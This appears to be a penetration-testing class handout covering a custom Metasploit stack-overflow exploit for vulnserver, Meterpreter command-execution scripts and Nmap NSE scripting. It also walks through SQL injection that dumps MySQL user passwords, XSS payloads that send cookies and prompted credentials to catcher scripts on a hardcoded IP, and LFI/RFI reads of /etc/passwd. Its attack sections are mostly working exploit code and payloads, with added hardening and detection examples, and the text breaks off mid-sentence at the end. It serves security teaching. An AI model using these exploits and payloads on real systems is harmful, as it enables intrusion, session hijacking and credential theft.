Again, we can see that our stages are coded for particular operating systems and languages.
We can take a look at shell.rb and see the shellcode that would be put into the payload that would be staged on the
victim machine, which would be encoded to tell the victim machine where to connect back to and what commands to run,
if any.
 
- Other module directories include nops, encoders, and post. Post modules are what are used in sessions that have
already been opened in meterpreter, to gain more information on the victim machine, collect hashes, or even tokens,
so we can impersonate other users on the system in hopes of elevating our privileges.
---------------------------Type This-----------------------------------
cd ../../../post/
ls
cd windows/
ls
-----------------------------------------------------------------------
 
 
Inside the windows directory we can see all the post modules that can be run. The capture directory holds all
the modules to load keyloggers, or grab input from the victim machine. Escalate has modules that will try to
escalate our privileges. Gather has modules that will try to enumerate the host to get as much information as
possible out of it. The WLAN directory holds modules that can pull down WiFi access points that the victim has in
memory/registry and give you the AP names as well as the WEP/WPA/WPA2 key for the network.
 
 
 
---------------------------Type This-----------------------------------
 
cd /usr/share/metasploit-framework/modules/exploits/windows/misc
 
nano vulnserv.rb
-------(paste the code below into this file)-------
#
#
# /usr/share/metasploit-framework/modules/exploits/windows/misc
 
# Class wrapper for the module (required for it to load; the trailing "end" below closes it).
# Older framework versions name the class Metasploit3 instead of MetasploitModule.
class MetasploitModule < Msf::Exploit::Remote
    include Msf::Exploit::Remote::Tcp

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Custom vulnerable server stack overflow',
            'Description'    => %q{
                This module exploits a stack overflow in an app called
                vulnserver that is designed to teach simple exploitation.
                },
            'Author'         => [ 'Joe McCray' ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                },
            'Payload'        =>
                {
                    'Space'    => 800,            # bytes available for the encoded payload
                    'BadChars' => "\x00\x20",     # bytes the encoder must avoid
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [
                        'Windows XP SP3 EN',
                            {
                                'Ret' => 0x625011AF,  # value written over the saved return address
                            }
                    ],
                ],
            'DefaultTarget' => 0,
            'Privileged'     => false
            ))

        register_options(
        [
            Opt::RPORT(9999)          # vulnserver listens on 9999
        ], self.class)
    end

    def exploit
        connect
        sock.recv(1024)               # read the banner first

        p = "\x41" * 16               # padding between the return address and the payload
        p << payload.encoded

        hdr = "TRUN ."                # the command the fuzzer crashed on
        boom = pattern_create(3000)   # cyclic filler; only the two slots below are meaningful
        boom[2006, 4] = [target.ret].pack('V')  # EIP value
        boom[2010, p.length] = p

        sploit = hdr + boom

        sock.put(sploit)

        handler
        disconnect
    end

end
------------------end of copy/paste content --------------
 
 
 
---------------------------Type This-----------------------------------
cd /usr/share/metasploit-framework
 
./msfconsole
 
 
use exploit/windows/misc/vulnserv
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST CHANGEME-TO-YOUR-WIN7-IP
set RPORT 9999
exploit
-----------------------------------------------------------------------
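The module above fills the TRUN buffer with pattern_create(3000) and hardcodes the EIP slot at offset 2006. As an added example (not from the original notes and not Metasploit's own code), the Python below reimplements the same cyclic-pattern scheme plus the offset lookup, so you can check such an offset from the four bytes a debugger shows in EIP; the EIP value used, 0x396F4338, is constructed from the pattern itself.

```python
import string

# Character sets cycled by the Metasploit-style pattern: upper, lower, digit.
# The digit set advances fastest, so the pattern begins "Aa0Aa1Aa2...".
_SETS = (string.ascii_uppercase, string.ascii_lowercase, string.digits)


def pattern_create(length: int) -> str:
    """Return a cyclic pattern of `length` chars using the Metasploit triple scheme."""
    if length < 0:
        raise ValueError("length must be non-negative")
    chunks = []
    for a in _SETS[0]:
        for b in _SETS[1]:
            for c in _SETS[2]:
                chunks.append(a + b + c)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    # Every triple used up (20,280 chars): repeat the cycle; offsets are then
    # unique only within the first cycle.
    full = "".join(chunks)
    return (full * (length // len(full) + 1))[:length]


def pattern_offset(pattern: str, value, width: int = 4) -> int:
    """Find where `value` sits in `pattern`.

    `value` is either the substring itself ("8Co9") or the register value an x86
    debugger shows (0x396F4338), which is the same bytes read little-endian.
    Returns -1 when the bytes are not from the pattern, i.e. no clean overwrite.
    """
    if isinstance(value, int):
        needle = value.to_bytes(width, "little").decode("ascii", errors="replace")
    else:
        needle = value
    if len(needle) < width:
        raise ValueError("need at least %d bytes to locate an offset" % width)
    return pattern.find(needle)


def expected_register(pattern: str, offset: int, width: int = 4) -> int:
    """Register value a debugger would show if the slot at `offset` were loaded into it."""
    slot = pattern[offset:offset + width].encode("ascii")
    if len(slot) != width:
        raise ValueError("offset %d is past the end of the pattern" % offset)
    return int.from_bytes(slot, "little")


if __name__ == "__main__":
    pat = pattern_create(3000)
    eip = expected_register(pat, 2006)   # constructed: 0x396F4338 for this pattern
    print("EIP 0x%08X -> offset %d" % (eip, pattern_offset(pat, eip)))
```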
 
 
 
 
########################################
# Down and dirty Meterpreter Scripting #
########################################
 
-----------------------------------------------------------------------
- In this lab we will be looking at how you can use some custom Meterpreter scripts to do more than what Metasploit
can offer.  This will also show you the flexibility of the Meterpreter scripts.
 
- We're going to start off with a simple Hello World script first.  
 
- Keep your meterpreter shell open from the previous lab exercises, and in a new Linux command window type the following: 
---------------------------Type This-----------------------------------  
echo 'print_status("Hello World")' > /usr/share/metasploit-framework/scripts/meterpreter/helloworld.rb
-----------------------------------------------------------------------
 
- This next portion is up to you: exploit your test box and end up with a Meterpreter shell.
 
- Let's test out our helloworld.rb Meterpreter script.
 
---------------------------Type This-----------------------------------
meterpreter> run helloworld
----------------------------------------------------------------------- 
 
- So far so good, now we can build on this base.  Let's add a couple more API calls to the script.
 
- Open /usr/share/metasploit-framework/scripts/meterpreter/helloworld.rb in your favorite editor and add the following
lines.
---------------------------Type This-----------------------------------
vi /usr/share/metasploit-framework/scripts/meterpreter/helloworld.rb
-------(paste the code below into this file)-------
print_error("this is an error!")
print_line("this is a line")
-----------------------------------------------------------------------
 
- Now run the script:
 
meterpreter> run helloworld
 
 
- Now that we have the basics down, we're going to do something a little more exciting.  
- The architecture to follow when creating these scripts goes as follows:
 
def getinfo(session)
        begin
            <stuff goes here>
        rescue ::Exception => e
            <stuff goes here>
        end
end
 
-----------------------------------------------------------------------
 
- Copy and paste the following code into our helloworld.rb script:
---------------------------Type This-----------------------------------
vi /usr/share/metasploit-framework/scripts/meterpreter/helloworld.rb
-------(paste the code below into this file)-------
def getinfo(session)
    begin
        sysnfo = session.sys.config.sysinfo    # hash with 'OS', 'Computer', etc.
        runpriv = session.sys.config.getuid
        print_status("Getting system information ...")
        print_status("The target machine OS is #{sysnfo['OS']}")
        print_status("The computer name is #{sysnfo['Computer']} ")
        print_status("Script running as #{runpriv}")
    rescue ::Exception => e
        print_error("The following error was encountered #{e}")
    end
end
 
getinfo(client)
--------------------------------------------------------------------------
 
 
- Now run the script:
---------------------------Type This-----------------------------------
meterpreter> run helloworld
----------------------------------------------------------------------- 
 
- We can expand it by adding actual system commands to the script. Let's look at how we can do this.
---------------------------Type This-----------------------------------
vi /usr/share/metasploit-framework/scripts/meterpreter/helloworld.rb
-------(paste the code below into this file)-------
def list_exec(session,cmdlst)
    print_status("Running Command List ...")
    r=''
    session.response_timeout=120
    cmdlst.each do |cmd|
       begin
          print_status "running command #{cmd}"
          # Hidden: no console window on the target; Channelized: we can read the output
          r = session.sys.process.execute("cmd.exe /c #{cmd}", nil, {'Hidden' => true, 'Channelized' => true})
          while(d = r.channel.read)
             print_status("#{d}")
          end
          r.channel.close
          r.close
       rescue ::Exception => e
          print_error("Error Running Command #{cmd}: #{e.class} #{e}")
       end
    end
end
 
commands = [ "set",
    "ipconfig  /all",
    "arp -a"]
 
list_exec(client,commands)
------------------------------------------------------------------------
 
 
- Run the script:
---------------------------Type This-----------------------------------
meterpreter> run helloworld
----------------------------------------------------------------------- 
 
 
 
#########################
# Meterpreter Challenge #
#########################
Note: Add all of the commands from the script below to your helloworld.rb script:
https://raw.githubusercontent.com/rapid7/metasploit-framework/master/scripts/meterpreter/winenum.rb
 
 
 
---------------------------------------------------------------------------------
 
 
#####################################
# Writing Your Own Nmap NSE Scripts #
#####################################
 
 
----------------------------------------------------------------------
sudo vi /usr/share/nmap/scripts/intro-nse.nse
 
-- The Head Section --
-- The Rule Section --
portrule = function(host, port)
    return port.protocol == "tcp"
            and port.number == 80
            and port.state == "open"
end
 
-- The Action Section --
action = function(host, port)
    return "Munich Hacking!"
end
----------------------------------------------------------------------
 
- Ok, now that we've made that change let's run the script
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443
 
 
 
----------------------------------------------------------------------
sudo vi /usr/share/nmap/scripts/intro-nse.nse
 
-- The Head Section --
local shortport = require "shortport"
 
-- The Rule Section --
portrule = shortport.http
 
-- The Action Section --
action = function(host, port)
    return "Munich Hacking!"
end
----------------------------------------------------------------------
 
- Ok, now that we've made that change let's run the script
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443
 
 
 
OK, now let's have some fun with my buddy Carlos Perez's website.
 
----------------------------------------------------------------------
sudo vi /usr/share/nmap/scripts/intro-nse.nse
 
-- The Head Section --
local shortport = require "shortport"
local http = require "http"
 
-- The Rule Section --
portrule = shortport.http
 
-- The Action Section --
action = function(host, port)
 
    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)
    return response.status
 
end
----------------------------------------------------------------------
 
- Ok, now that we've made that change let's run the script
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443
 
 
 
----------------------------------------------------------------------
sudo vi /usr/share/nmap/scripts/intro-nse.nse
 
-- The Head Section --
local shortport = require "shortport"
local http = require "http"
 
-- The Rule Section --
portrule = shortport.http
 
-- The Action Section --
action = function(host, port)
 
    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)
 
    if ( response.status == 200 ) then
        return response.body
    end
 
end
----------------------------------------------------------------------
 
- Ok, now that we've made that change let's run the script
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443
 
 
 
----------------------------------------------------------------------
sudo vi /usr/share/nmap/scripts/intro-nse.nse
 
-- The Head Section --
local shortport = require "shortport"
local http = require "http"
local string = require "string"
 
-- The Rule Section --
portrule = shortport.http
 
-- The Action Section --
action = function(host, port)
 
    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)
 
    if ( response.status == 200 ) then
        local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
        return title
    end
 
end
----------------------------------------------------------------------
 
- Ok, now that we've made that change let's run the script
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443
 
 
 
----------------------------------------------------------------------
sudo vi /usr/share/nmap/scripts/intro-nse.nse
 
-- The Head Section --
local shortport = require "shortport"
local http = require "http"
local string = require "string"
 
-- The Rule Section --
portrule = shortport.http
 
-- The Action Section --
action = function(host, port)
 
    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)
 
    if ( response.status == 200 ) then
        local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
 
        if (title) then
            return "Vulnerable"
        else
            return "Not Vulnerable"
        end
    end
end
 
----------------------------------------------------------------------
 
- Ok, now that we've made that change let's run the script
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443
 
 
 
################################
# Attack Environment Deployers #
################################
https://github.com/mantvydasb/Red-Team-Infrastructure-Automation
 
 
 
#################
# Lab Deployers #
#################
https://github.com/jaredhaight/PowerShellClassLab
https://github.com/outflanknl/Invoke-ADLabDeployer
https://github.com/AutomatedLab/AutomatedLab
 
 
 
###############
# Persistence #
###############
https://rastamouse.me/2018/03/a-view-of-persistence/
https://blog.inspired-sec.com/archive/2017/01/20/WMI-Persistence.html
https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
 
 
 
####################
# Lateral Movement #
####################
 
 
###########################
# Bypassing EDR Solutions #
###########################
https://lospi.net/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html
https://github.com/vysecurity/morphHTA
https://labs.mwrinfosecurity.com/blog/experimenting-bypassing-memory-scanners-with-cobalt-strike-and-gargoyle/
 
 
#######################
# Attacking PHP/MySQL #
#######################
 
Go to the LAMP target homepage
---------------------------Paste this into Firefox-----------------------------------
http://45.63.104.73/
-------------------------------------------------------------------------------------
 
 
Clicking on the Acer link:
---------------------------Paste this into Firefox-----------------------------------
http://45.63.104.73/acre2.php?lap=acer
-------------------------------------------------------------------------------------
 
    - Found parameter passing (answer yes to question 1)
    - Insert ' to test for SQLI
 
---------------------------Paste this into Firefox-----------------------------------
http://45.63.104.73/acre2.php?lap=acer'
-------------------------------------------------------------------------------------  
 
Page returns the following error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''acer''' at line 1
 
 
In order to perform union-based SQL injection, we must first determine the number of columns in this query.
We do this using ORDER BY:
---------------------------Paste this into Firefox-----------------------------------
http://45.63.104.73/acre2.php?lap=acer' order by 100-- +
-------------------------------------------------------------------------------------
 
 
Page returns the following error:
Unknown column '100' in 'order clause'
 
 
---------------------------Paste this into Firefox-----------------------------------
http://45.63.104.73/acre2.php?lap=acer' order by 50-- +
-------------------------------------------------------------------------------------  
 
 
Page returns the following error:
Unknown column '50' in 'order clause'
 
 
---------------------------Paste this into Firefox-----------------------------------
http://45.63.104.73/acre2.php?lap=acer' order by 25-- +
-------------------------------------------------------------------------------------
 
Page returns the following error:
Unknown column '25' in 'order clause'
 
 
---------------------------Paste this into Firefox-----------------------------------
http://45.63.104.73/acre2.php?lap=acer' order by 12-- +
-------------------------------------------------------------------------------------
 
Page returns the following error:
Unknown column '12' in 'order clause'
 
 
---------------------------Paste this into Firefox-----------------------------------
http://45.63.104.73/acre2.php?lap=acer' order by 6-- +
-------------------------------------------------------------------------------------
---Valid page returned for 5 and 6...error on 7 so we know there are 6 columns
 
 
 
Now we build out the union all select statement with the correct number of columns
 
Reference:
http://www.techonthenet.com/sql/union.php
 
 
---------------------------Paste this into Firefox-----------------------------------
http://45.63.104.73/acre2.php?lap=acer' union all select 1,2,3,4,5,6-- +
-------------------------------------------------------------------------------------
 
 
 
Now we negate the parameter value 'acer' by turning it into the word 'null':
---------------------------Paste this into Firefox-----------------------------------
http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j
-------------------------------------------------------------------------------------
 
We see that a 4 and a 5 are on the screen. These are the columns that will echo back data.
 
 
Use a cheat sheet for syntax:
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
 
---------------------------Paste these one line at a time into Firefox-----------------------------------
http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),5,6-- j
 
http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),version(),6-- j
 
http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@version,6-- +
 
http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@datadir,6-- +
 
http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user,password,6 from mysql.user -- a
---------------------------------------------------------------------------------------------------------
 
 
 
 
Sometimes students ask about the "-- j" or "-- +" that I append to the SQL injection attack string.
 
Here is a good reference for it:
https://www.symantec.com/connect/blogs/mysql-injection-comments-comments
 
Both attackers and penetration testers alike often forget that MySQL comments deviate from the standard ANSI SQL specification. The double-dash comment syntax was first supported in MySQL 3.23.3. However, in MySQL a double-dash comment "requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on)." This double-dash comment syntax deviation is intended to prevent complications that might arise from the subtraction of negative numbers within SQL queries. Therefore, the classic SQL injection exploit string will not work against backend MySQL databases because the double-dash will be immediately followed by a terminating single quote appended by the web application. However, in most cases a trailing space needs to be appended to the classic SQL exploit string. For the sake of clarity we'll append a trailing space and either a "+" or a letter.
 
 
 
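Added example, not part of the original notes: a Python/sqlite3 model of the acre2.php lookup with a constructed six-column laptops table, showing why string concatenation lets the ORDER BY probes and the UNION ALL SELECT string above reach the database while the same values do nothing against a bound parameter. The table name, column names and rows are assumptions; one caveat is noted in the code about SQLite's comment syntax versus MySQL's.

```python
import sqlite3

# Constructed stand-in for the table behind acre2.php: six columns, which is what the
# ORDER BY probes above established (valid page for 6, error on 7).
SCHEMA = """
CREATE TABLE laptops (id INTEGER, brand TEXT, model TEXT, cpu TEXT, ram TEXT, price REAL);
INSERT INTO laptops VALUES (1, 'acer', 'Aspire 5', 'i5', '8GB', 549.0);
INSERT INTO laptops VALUES (2, 'dell', 'XPS 13', 'i7', '16GB', 1299.0);
"""


def connect_demo() -> sqlite3.Connection:
    """In-memory database loaded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, lap: str):
    """The pattern behind the page's acre2.php: the lap value is pasted into the SQL
    text, so a quote ends the literal and everything after it is parsed as SQL."""
    sql = "SELECT * FROM laptops WHERE brand = '" + lap + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, lap: str):
    """Hardened form: the value is bound as a parameter and never becomes SQL text."""
    return conn.execute("SELECT * FROM laptops WHERE brand = ?", (lap,)).fetchall()


def probe(conn: sqlite3.Connection, lookup, lap: str) -> str:
    """Run one lap value through a lookup and summarise it the way the page reads
    the response: either the database error or a row count."""
    try:
        rows = lookup(conn, lap)
    except sqlite3.Error as exc:
        return "error: " + str(exc)
    return "rows: %d" % len(rows)


# The probes from the walkthrough. Caveat: SQLite accepts "--" with nothing after it;
# MySQL needs whitespace after "--", which is why the page writes "-- +" and "-- j".
PROBES = (
    "acer",
    "acer'",
    "acer' order by 100-- +",
    "acer' order by 6-- +",
    "acer' order by 7-- +",
    "null' union all select 1,2,3,4,5,6-- j",
)


def compare(conn: sqlite3.Connection):
    """Outcome of every probe against both lookups: {lap: (vulnerable, safe)}."""
    return {lap: (probe(conn, lookup_vulnerable, lap), probe(conn, lookup_safe, lap))
            for lap in PROBES}


if __name__ == "__main__":
    for lap, (vuln, safe) in compare(connect_demo()).items():
        print("%-42r vulnerable: %-60s safe: %s" % (lap, vuln, safe))
```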
###############################################################################
# What is XSS                                                                 #
# https://s3.amazonaws.com/infosecaddictsfiles/2-Intro_To_XSS.pptx            #
###############################################################################
 
OK - what is Cross Site Scripting (XSS)?
 
1. Use Firefox to browse to the following location:
    ---------------------------Paste this into Firefox-----------------------------------
    http://45.63.104.73/xss_practice/
    -------------------------------------------------------------------------------------
 
    A really simple search page that is vulnerable should come up.
 
 
 
2. In the search box type:
    ---------------------------Paste this into Firefox-----------------------------------
    <script>alert('So this is XSS')</script>
    -------------------------------------------------------------------------------------
 
 
    This should pop up an alert window with your message in it, proving XSS is in fact possible.
    Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
 
 
3. In the search box type:
    ---------------------------Paste this into Firefox-----------------------------------
    <script>alert(document.cookie)</script>
    -------------------------------------------------------------------------------------
 
 
    This should pop up an alert window with your cookie in it, proving XSS is in fact possible and your cookie can be accessed.
    Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
 
4. Now replace that alert script with:
    ---------------------------Paste this into Firefox-----------------------------------
    <script>document.location="http://45.63.104.73/xss_practice/cookie_catcher.php?c="+document.cookie</script>
    -------------------------------------------------------------------------------------
 
This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
 
 
5. Now view the stolen cookie at:
   ---------------------------Paste this into Firefox-----------------------------------
   http://45.63.104.73/xss_practice/cookie_stealer_logs.html
   -------------------------------------------------------------------------------------  
 
The cookie catcher writes to this file, and all we have to do is make sure that it has permissions to be written to.
 
 
 
 
############################
# A Better Way To Demo XSS #
############################
 
 
Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.
 
 
Use Firefox to browse to the following location:
---------------------------Paste this into Firefox-----------------------------------
    http://45.63.104.73/xss_practice/
-------------------------------------------------------------------------------------  
 
 
Paste this in the search box
----------------------------
 
 
Option 1
--------
---------------------------Paste this into Firefox-----------------------------------
<script>
password=prompt('Your session is expired. Please enter your password to continue',' ');
document.write("<img src=\"http://45.63.104.73/xss_practice/passwordgrabber.php?password=" +password+"\">");
</script>
-------------------------------------------------------------------------------------  
 
Now view the stolen password at:
---------------------------Paste this into Firefox-----------------------------------
    http://45.63.104.73/xss_practice/passwords.html
-------------------------------------------------------------------------------------  
 
 
Option 2
--------
-------------------------Paste this into Firefox-----------------------------------
<script>
username=prompt('Please enter your username',' ');
password=prompt('Please enter your password',' ');
document.write("<img src=\"http://45.63.104.73/xss_practice/unpw_catcher.php?username="+username+"&password="+password+"\">");
</script>
-------------------------------------------------------------------------------------  
 
 
Now view the stolen username and password at:
http://45.63.104.73/xss_practice/username_password_logs.html
 
 
 
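Added example (not part of the original notes): the reflection behind the practice search page modelled in Python, the alert() payload from step 2 beside its HTML-encoded rendering, and a detector that pulls the same probes out of constructed web-server log lines. The log lines, client addresses and the attacker.example host are all constructed.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Payload from step 2 of the walkthrough, used here only as test input.
ALERT_PAYLOAD = "<script>alert('So this is XSS')</script>"

# Combined log line: client, request line, status (Apache/nginx default layout).
_LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Markers of a reflected-XSS probe, compared after URL decoding and lowercasing.
_MARKERS = ("<script", "document.cookie", "document.location", "onerror=")

# Constructed sample access log: one benign search, then the step 3 and step 4 probes.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Mar/2019:10:15:02 +0000] "GET /xss_practice/?q=acer HTTP/1.1" 200 1042 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Mar/2019:10:15:40 +0000] "GET /xss_practice/?q=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 1100 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Mar/2019:10:16:01 +0000] "GET /xss_practice/?q=%3Cscript%3Edocument.location%3D%22http%3A//attacker.example/c.php%3Fc%3D%22%2Bdocument.cookie%3C/script%3E HTTP/1.1" 200 1100 "-" "Mozilla/5.0"',
    "this line is not in log format and is skipped",
]


def render_search_vulnerable(term: str) -> str:
    """Models the practice page: the search term is written straight back into the HTML."""
    return "<p>You searched for: " + term + "</p>"


def render_search_safe(term: str) -> str:
    """Hardened form: HTML-encode the term for the element-content context it lands in."""
    return "<p>You searched for: " + html.escape(term, quote=True) + "</p>"


def is_active_markup(fragment: str) -> bool:
    """True when a rendered fragment still carries a raw script tag (what the alert() test proves)."""
    return "<script" in fragment.lower()


def flag_xss_probes(log_lines):
    """Return (client, parameter, decoded value) for every query parameter carrying an XSS marker."""
    hits = []
    for line in log_lines:
        m = _LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                # parse_qs already decoded once; decode again to catch double-encoded probes.
                decoded = unquote(value)
                if any(marker in decoded.lower() for marker in _MARKERS):
                    hits.append((m.group("client"), name, decoded))
    return hits


if __name__ == "__main__":
    print(render_search_vulnerable(ALERT_PAYLOAD))
    print(render_search_safe(ALERT_PAYLOAD))
    for client, name, value in flag_xss_probes(SAMPLE_LOG):
        print("probe from %s in %s: %s" % (client, name, value))
```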
#########################################
# Let's try a local file include (LFI)  #
#########################################
- Here is an example of an LFI
- Open this page in Firefox:
-------------------------Paste this into Firefox-----------------------------------
http://45.63.104.73/showfile.php?filename=contactus.txt
-------------------------------------------------------------------------------------
 
 
- Notice the page name (showfile.php), the parameter name (filename) and the filename (contactus.txt)
- Here you see a direct reference to a file on the local filesystem of the victim machine.
- You can attack this by doing the following:
-------------------------Paste this into Firefox-----------------------------------
http://45.63.104.73/showfile.php?filename=/etc/passwd
-------------------------------------------------------------------------------------
 
 
- This is an example of a Local File Include (LFI). To change this attack into a Remote File Include (RFI) you need some content from
  somewhere else on the Internet. Here is an example of a text file on the web:
-------------------------Paste this into Firefox-----------------------------------
http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
-------------------------------------------------------------------------------------
 
- Now we can attack the target via RFI like this:
-------------------------Paste this into Firefox-----------------------------------
http://45.63.104.73/showfile.php?filename=http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
-------------------------------------------------------------------------------------
 
 
 
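Added example (not part of the original notes): a hardened version of the showfile.php lookup in Python, which accepts contactus.txt but rejects the three inputs the walkthrough uses against it (an absolute path, a traversal path, and a URL that turns the LFI into an RFI). The document directory, its contents and the function names are assumptions for the demo.

```python
import os
import tempfile
from urllib.parse import urlsplit


class UnsafeFilename(ValueError):
    """Raised for any filename that would read outside the document directory."""


def resolve_document(base_dir: str, filename: str) -> str:
    """Return an absolute path under base_dir for `filename`, or raise UnsafeFilename.

    Blocks the escapes shown above: a URL scheme (http://... makes the include remote),
    an absolute path (/etc/passwd), and traversal (../) that resolves outside base_dir.
    """
    if not filename or "\x00" in filename:
        raise UnsafeFilename("empty or NUL-containing filename")
    if urlsplit(filename).scheme:
        raise UnsafeFilename("URL schemes are not allowed")
    if os.path.isabs(filename):
        raise UnsafeFilename("absolute paths are not allowed")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, filename))
    # realpath follows symlinks and collapses "..", so this compares final locations.
    if os.path.commonpath([base, candidate]) != base:
        raise UnsafeFilename("path escapes the document directory")
    return candidate


def show_file(base_dir: str, filename: str) -> str:
    """The hardened showfile.php: read only what resolve_document permits."""
    path = resolve_document(base_dir, filename)
    with open(path, "r", encoding="utf-8") as fh:
        return fh.read()


# The requests from the walkthrough plus a missing file (constructed).
REQUESTS = (
    "contactus.txt",
    "/etc/passwd",
    "../../etc/passwd",
    "http://www.example.com/hello.txt",
    "missing.txt",
)


def demo():
    """Run every request against a throwaway document directory; returns {filename: outcome}."""
    results = {}
    with tempfile.TemporaryDirectory() as base:
        with open(os.path.join(base, "contactus.txt"), "w", encoding="utf-8") as fh:
            fh.write("Contact us at the front desk.\n")
        for name in REQUESTS:
            try:
                results[name] = show_file(base, name)
            except (UnsafeFilename, OSError) as exc:
                results[name] = "rejected: " + exc.__class__.__name__
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print("%-36s -> %s" % (name, outcome.strip()))
```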
###############################
1534
# How much fuzzing is enough? #
1535
###############################
1536
There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.
1537
 
1538
Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.
1539
 
1540
 
1541
Step 1: Ask yourself the 3 questions per page of the site.
1542
 
1543
Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter)
1544
 
1545
Step 3: When you load your fuzz strings - use the following decision tree
1546
 
1547
    - Are the fuzz strings causing a default error message (example 404)?
1548
        - If this is the case then it is most likely NOT vulnerable
1549
 
1550
    - Are the fuzz strings causing a WAF or LB custom error message?
1551
        - If this is the case then you need to find an encoding method to bypass
1552
 
1553
 
1554
    - Are the fuzz strings causing an error message that discloses the backend type?
1555
        - If yes, then identify DB type and find correct syntax to successfully exploit
1556
        - Some example strings that I use are:
1557
            '
1558
            "
1559
            ()          <----- Take the parameter value and put it in parenthesis
1560
            (5-1)       <----- See if you can perform an arithmetic function
1561
 
1562
 
1563
    - Are the fuzz strings rendering executable code?
1564
        - If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
1565
        - Some example strings that I use are:
1566
            <b>hello</b>
1567
            <u>hello</u>
1568
            <script>alert(123);</script>
1569
            <script>alert(xss);</script>
1570
            <script>alert('xss');</script>
1571
            <script>alert("xss");</script>
1572
 
1573
 
###############################################################
# Question 1: What is the process that you use when you test? #
###############################################################

Step 1: Automated Testing

Step 1a: Web Application vulnerability scanners
-----------------------------------------------
- Run two (2) unauthenticated vulnerability scans against the target
- Run two (2) authenticated vulnerability scans against the target with low-privilege user credentials
- Run two (2) authenticated vulnerability scans against the target with admin credentials

The web application vulnerability scanners that I use for this process are HP WebInspect and Acunetix.

A good web application vulnerability scanner comparison website is here:
http://sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html

Look for cases where both scanners identify the same vulnerability. Investigate these thoroughly, confirm that the finding is NOT a false positive, and report the issue.

When one (1) scanner identifies a vulnerability that the other does not, still investigate the case thoroughly, confirm that it is NOT a false positive, and report the issue.

Be suspicious of authenticated scans that take more than 3 or 4 hours: the scanner has probably lost its session (timeout, or it followed a logout link) and is no longer exercising the application, so it is not finding real vulnerabilities anymore. Check the scan log for long runs of identical responses or redirects to the login page, re-authenticate, and re-run.

Also, be sure to save the scan results and logs. I usually provide this data to the customer.

Step 1b: Directory Brute Forcer
-------------------------------
I like to run DirBuster or a similar tool. This is great for finding hidden gems (backups of the website, information leakage, unreferenced files, dev sites, etc).

Step 2: Manual Testing

Try to do this step while your automated scans are running. Use Burp Suite or the Tamper Data Firefox extension to browse EVERY PAGE of the website (if this is realistic).

Step 2a: Spider/Scan the entire site with Burp Suite
Save the spider and scan results. I usually provide this data to the customer as well.

Step 2b: Browse through the site using the 3 question method
Have Burp Suite on with intercept turned off. Browse the website using the 3 question method that I've taught you in the past. When you find a place in the site where the answer to one of the 3 questions is yes, look at that individual web request in the Target tab of Burp Suite, right-click on that request and choose 'Send to Intruder'.

Take the appropriate fuzz list from https://github.com/fuzzdb-project/fuzzdb/ and load it into Intruder. A quick tip for each individual payload: be sure to send the payload both with and without the original parameter value.

Here is what I mean:
